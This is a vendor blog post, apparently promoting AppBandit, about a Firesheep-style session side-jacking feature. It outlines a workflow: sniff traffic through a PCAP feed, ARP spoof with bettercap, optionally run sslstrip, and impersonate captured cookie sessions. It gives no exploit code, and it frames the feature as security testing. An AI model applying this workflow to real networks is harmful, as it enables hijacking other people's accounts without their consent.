Session Side Jacking

Implementing Firesheep 2.0 in AppBandit

Thu Mar 15 2018 16:56:50 GMT+0000 (GMT)

Firesheep was an extension for Mozilla Firefox, which allowed for sniffing unencrypted traffic, for example by eavesdropping a public WiFi network, and later impersonating valid captured web sessions by automatically setting up the session cookies in the browser - i.e allowing the attacker to access Facebook, for example, as the user whose session was hijacked. The tool was released in 2010 and it was well accepted world-wide - there is even a Wikipedia page as you can see. Firesheep was a lot of fun as it made the whole process from capture to impersonation straightforward. For various reasons, the Firesheep extension was later discontinued.

The attack used by Firesheep is well understood and frankly, it was not even new at the time when the tool appeared. There were and still are numerous tools to help you sniff and attack networks of any types. For example, you can easily sniff traffic with off-the-shelf tools like tcpdump, ARP spoof with tools like bettercap, DNS poison with some basic python scripts and much more. However, when it comes to actually logging in as the user who was attacked, it is still the case of manual setup. There is no replacement for the almighty Firesheep - well until now.

Starting from version 0.2.0 you can impersonate any session captured by AppBandit. Multiple concurrent sessions are also supported. The spirit of Firesheep will live on. With AppBandit now you can open a whole new world of security research and security testing. Let's look how this is done with a real-world example - sort of.

AppBandit is an interception attack proxy so any traffic that goes through its built-in proxy server can be impersonated. But unlike other proxies, this is not a requirement, neither it is the only thing it does. AppBandit can consume data feeds from remote endpoints including processing PCAP data captured by libpcap and equivalent libraries. We will use "Pown Now" from pown.js to capture the data. The endpoint is setup locally for convenience but you can put it anywhere, including your Pi Zero W.

As illustrated by the screenshot above, "Pown Now" is set up to listen on en0. We can connect to it with AppBandit. Again, this can be set up anywhere really and of course, you can even easily implement your own endpoint in Rust or Go.

The feed is now configured in AppBandit. This effectively means that whatever passes through the endpoint we are connecting to, we will be able to see. Next, we need to use a tool to perform an active attack such as ARP spoof. There are several off-the-shelf tools that can help us with that. One of them is bettercap. Let's do it.

We can improve upon this configuration a bit. For example, we can turn on sslstrip and perhaps use the proxy options to pipe directly in AppBandit but this is not required at the moment. And yes, if you are on Mac, you should do sysctl -w net.inet.ip.forwarding=1 to enable IP forwarding.

Sure enough, we have a session in AppBandit - don't ask how. Notice the "Impersonate" option in the request menu. If you click on it you get Kermit. We still need to work on the UI but the feature is 100% functional.

And we are done. We have omitted some details about the secret sauce not to make this article script kiddie friendly but the part about AppBandit is 100% accurate - the feature exists and it works and I am sure you will find it very useful in numerous situations - such as when performing mobile security assessments.